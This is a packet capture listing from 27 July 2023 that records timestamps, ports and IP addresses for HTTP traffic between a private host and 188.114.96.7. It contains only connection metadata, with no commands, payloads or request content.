Jul 27, 2023 20:19:23.625081062 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.625303030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.625329971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.625354052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.625376940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.625376940 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.625401974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.625430107 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.626306057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.626334906 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.626358032 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.626382113 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.626382113 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.626406908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.626429081 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.626461983 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.627146959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.627175093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.627198935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.627223015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.627242088 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.627248049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.627300978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.628782988 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.628807068 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.628829002 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.628854990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.628856897 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.628876925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.628880978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.628918886 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.629154921 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.629184008 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.629201889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.629220963 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.629225016 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.629239082 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.629259109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.630691051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.630718946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.630743027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.630767107 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.630786896 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.630790949 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.630853891 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.631097078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.631124973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.631149054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.631171942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.631172895 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.631196022 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.631220102 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.632818937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.632846117 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.632982016 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.646563053 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646585941 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646610975 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646631956 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.646636009 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646661043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646672964 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.646686077 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646709919 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646711111 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.646735907 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646760941 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646766901 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.646785021 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.646791935 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.647418976 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647439957 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647497892 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.647600889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647624969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647649050 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647666931 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.647682905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647712946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647713900 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.647758007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647761106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.647795916 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647820950 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.647866011 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.648387909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648415089 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648439884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648463964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648467064 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.648489952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648514986 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648516893 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.648533106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.648539066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648565054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.648572922 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.649245977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649285078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649310112 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649333954 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649338007 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.649358034 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649377108 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.649383068 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649394989 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.649406910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649431944 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.649440050 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.650182962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650211096 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650234938 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650244951 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.650259972 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650279999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.650284052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650309086 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650330067 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.650331974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650357008 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.650374889 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.651004076 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651029110 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651052952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651071072 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.651076078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651101112 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651108980 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.651141882 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.651146889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651171923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651196003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651215076 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.651889086 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651928902 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.651971102 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.651979923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652020931 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.652024984 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652050018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652075052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652098894 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652112007 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.652124882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652143002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.652772903 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652797937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652817965 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.652822971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652848005 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652865887 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.652872086 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652895927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652919054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652936935 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.652941942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.652966022 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.653661013 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653707981 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653733015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653757095 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653758049 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.653779984 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653793097 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.653804064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653820038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.653830051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653855085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.653865099 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.654545069 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654571056 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654593945 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654613018 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.654619932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654644012 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654650927 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.654668093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654674053 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.654691935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654715061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.654752970 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.655400991 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655426979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655451059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655476093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655495882 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.655498981 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655523062 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655548096 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655570984 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.655585051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.655623913 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.656316042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656347990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656404972 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.656482935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656526089 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.656570911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656595945 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656620026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656644106 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656656981 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.656666994 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656692028 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656708956 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.656714916 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.656722069 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.657358885 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657387018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657434940 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.657447100 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657470942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657480001 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.657495975 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657519102 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657542944 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657553911 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.657566071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.657587051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.658246994 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658273935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658297062 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.658344030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658369064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658380032 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.658392906 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658418894 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658442974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658451080 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.658467054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.658487082 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.659090042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659130096 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.659137011 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659181118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659204960 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659229040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659240961 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.659251928 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659275055 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.659276009 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659301043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.659320116 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.660012007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660056114 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660080910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660104036 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.660106897 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660134077 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660146952 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.660165071 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.660193920 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660218954 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660242081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.660284042 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.662967920 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.662996054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663208008 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.663471937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663496971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663520098 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.663521051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663546085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663561106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.663568974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663593054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663602114 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.663616896 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663640976 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663674116 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.663861990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663921118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663948059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663973093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.663974047 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.663996935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.664005041 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.664021015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.664046049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.664071083 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.664077997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.664089918 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.664094925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.664160013 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.665469885 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665499926 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665523052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665556908 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.665611982 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665636063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665651083 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.665661097 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665687084 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665710926 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.665729046 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.665757895 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.666344881 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666373968 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666399002 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666423082 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666443110 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.666446924 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666474104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666497946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666517973 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.666522980 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.666524887 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:23.666578054 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.667088985 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667115927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667139053 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667161942 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.667164087 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667187929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667200089 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.667213917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667237043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.667246103 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.667260885 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668024063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668051004 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668075085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668101072 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668117046 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.668127060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668149948 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.668152094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668170929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.668207884 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.684670925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.684710979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.684736013 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.684756041 CEST	80	49770	188.114.96.7	192.168.2.4
